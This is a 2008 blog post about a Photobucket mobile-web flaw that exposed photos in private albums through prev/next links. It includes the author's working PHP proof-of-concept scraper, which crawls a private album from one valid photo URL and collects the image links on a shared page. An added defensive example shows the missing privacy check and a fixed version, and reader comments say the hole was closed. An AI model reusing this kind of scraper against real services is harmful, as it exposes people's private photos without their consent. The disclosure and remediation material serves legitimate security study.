Photobucket has done it again. It appears that using the mobile-web domain (m55.photobucket.com), if you navigate to a valid image, you can use the previous/next links to view more photos in the account, even if it is set to private.
I have not checked, but I believe the hole has been patched. I was informed of this exploit by a friend, Jessie McKnight. The catch was that the prev/next buttons are initially very small (hence mobile web), and clicking all those links takes a lot of time.
I hacked up a working script in about an hour that takes a valid picture URL and visits it, scrapes the previous link, copies the image name and writes it, encapsulated in an image tag, to an HTML file using the original Photobucket URL (not the mobile domain); it then repeats this process on the URL obtained from the prev anchor.
This was a very intensive process, so I capped it at 50 requests. Storing the pictures on a separate page allowed for quicker retrievals while the script was crawling, and also for saving results from different people using the script at the same time.
This is in no way an optimized script; it was thrown together from scratch to completion in under an hour, and is just a P.O.C.
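<form method="GET" action=''>
    URL TO VALID PICTURE: <input type='text' name='album'><br/>
    <input type='submit'>
</form>
<?php
if (isset($_GET['album'])) {
    // Results are appended to a shared page so earlier runs stay available.
    $fh = fopen('photos.html', 'a');
    $get_album = $_GET['album'];

    // Split the supplied URL into picture name, album URL and album name.
    $picture  = substr(substr($get_album, strrpos($get_album, '/')), 1);
    $albumurl = substr($get_album, 0, strrpos($get_album, '/'));
    $album    = substr(substr($albumurl, strrpos($albumurl, '/')), 1);

    // Starting point on the mobile-web domain.
    $url = "http://m55.photobucket.com/albumview/albums/{$album}/{$picture}.html?";

    // Loop bound as posted (101 iterations); the text above mentions a cap of 50 requests.
    $i = 0;
    while ($i <= 100) {
        $url = getPrevUrl($url);
        $im  = getImage($url, $albumurl);
        fwrite($fh, $im);
        echo $im;
        $i++;
    }
    fclose($fh);
}

// Fetch a mobile page and return the URL behind its "prev" anchor.
function getPrevUrl($url) {
    // Double quotes so that $url is interpolated into the error message.
    $input = @file_get_contents($url) or die("Could not access file: $url");
    $regexp = "<a\s[^>]*href=(\"??)([^\" >]*?)\\1[^>]*>(.*)<\/a>";
    // The prev link is taken to be the fifth anchor on the page; fall back
    // to the current URL if the page has fewer anchors than expected.
    if (preg_match_all("/$regexp/siU", $input, $matches) && isset($matches[2][4])) {
        $photoUrl = "http://m55.photobucket.com" . $matches[2][4];
        return $photoUrl;
    } else {
        return $url;
    }
}

// Map a mobile page URL back to the image URL on the original domain.
function getImage($url, $alburl) {
    $photoUrl = substr($url, 0, strrpos($url, "."));
    $photoUrl = substr($photoUrl, strrpos($photoUrl, "/"));
    $photoUrl = $alburl . $photoUrl;
    // Escape before writing into HTML: $alburl comes straight from the query string.
    $photoUrl = htmlspecialchars($photoUrl, ENT_QUOTES);
    return "<img src='$photoUrl'/><br/>";
}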
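
The access-control pattern this bug points to, as an added example (not code from the original post or from Photobucket): it assumes the flaw was a prev/next lookup that skipped the album privacy check. All function names and data are constructed for illustration.

```php
<?php
// Constructed sample data: one private and one public album.
$albums = [
    'alice_private' => ['owner' => 'alice', 'private' => true,
                        'photos' => ['a1.jpg', 'a2.jpg', 'a3.jpg']],
    'bob_public'    => ['owner' => 'bob', 'private' => false,
                        'photos' => ['b1.jpg', 'b2.jpg']],
];

// One authorization decision shared by every front end (desktop, mobile, API).
function canView(array $album, ?string $viewer): bool {
    return !$album['private']
        || ($viewer !== null && $viewer === $album['owner']);
}

// Flawed pattern (hypothetical): navigation assumes the privacy check already
// happened elsewhere, so anyone holding one valid photo name can walk the album.
function prevPhotoUnchecked(array $albums, string $albumId, string $photo): ?string {
    $photos = $albums[$albumId]['photos'] ?? [];
    $i = array_search($photo, $photos, true);
    return ($i !== false && $i > 0) ? $photos[$i - 1] : null;
}

// Hardened pattern: the check lives inside the lookup and runs on every request,
// so a second domain or template cannot forget it.
function prevPhotoChecked(array $albums, string $albumId, string $photo, ?string $viewer): ?string {
    if (!isset($albums[$albumId]) || !canView($albums[$albumId], $viewer)) {
        // Same answer for "missing" and "forbidden" so the endpoint
        // does not confirm that a private album exists.
        return null;
    }
    $photos = $albums[$albumId]['photos'];
    $i = array_search($photo, $photos, true);
    return ($i !== false && $i > 0) ? $photos[$i - 1] : null;
}

// Anonymous visitor (viewer = null) starting from a photo in the private album.
var_dump(prevPhotoUnchecked($albums, 'alice_private', 'a3.jpg'));
var_dump(prevPhotoChecked($albums, 'alice_private', 'a3.jpg', null));
// The owner, and anonymous access to the public album, still work.
var_dump(prevPhotoChecked($albums, 'alice_private', 'a3.jpg', 'alice'));
var_dump(prevPhotoChecked($albums, 'bob_public', 'b2.jpg', null));
```

Only the unchecked lookup hands the anonymous visitor a neighbouring photo from the private album; the checked one returns null for that request while still serving the owner and the public album.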


July 19th, 2008 at 8:43 pm
I think you should post more often, I have enjoyed this so far. Added to my reader. SusanO
July 20th, 2008 at 10:05 am
Great info - keep up the great work.
August 11th, 2008 at 9:50 am
hey!
This sounds very interesting… but for me in some way it didn't work! Perhaps someone can explain it to me!?
Thx
August 19th, 2008 at 12:38 pm
The hole was closed quite quickly, it only worked for maybe a day or two once it was leaked.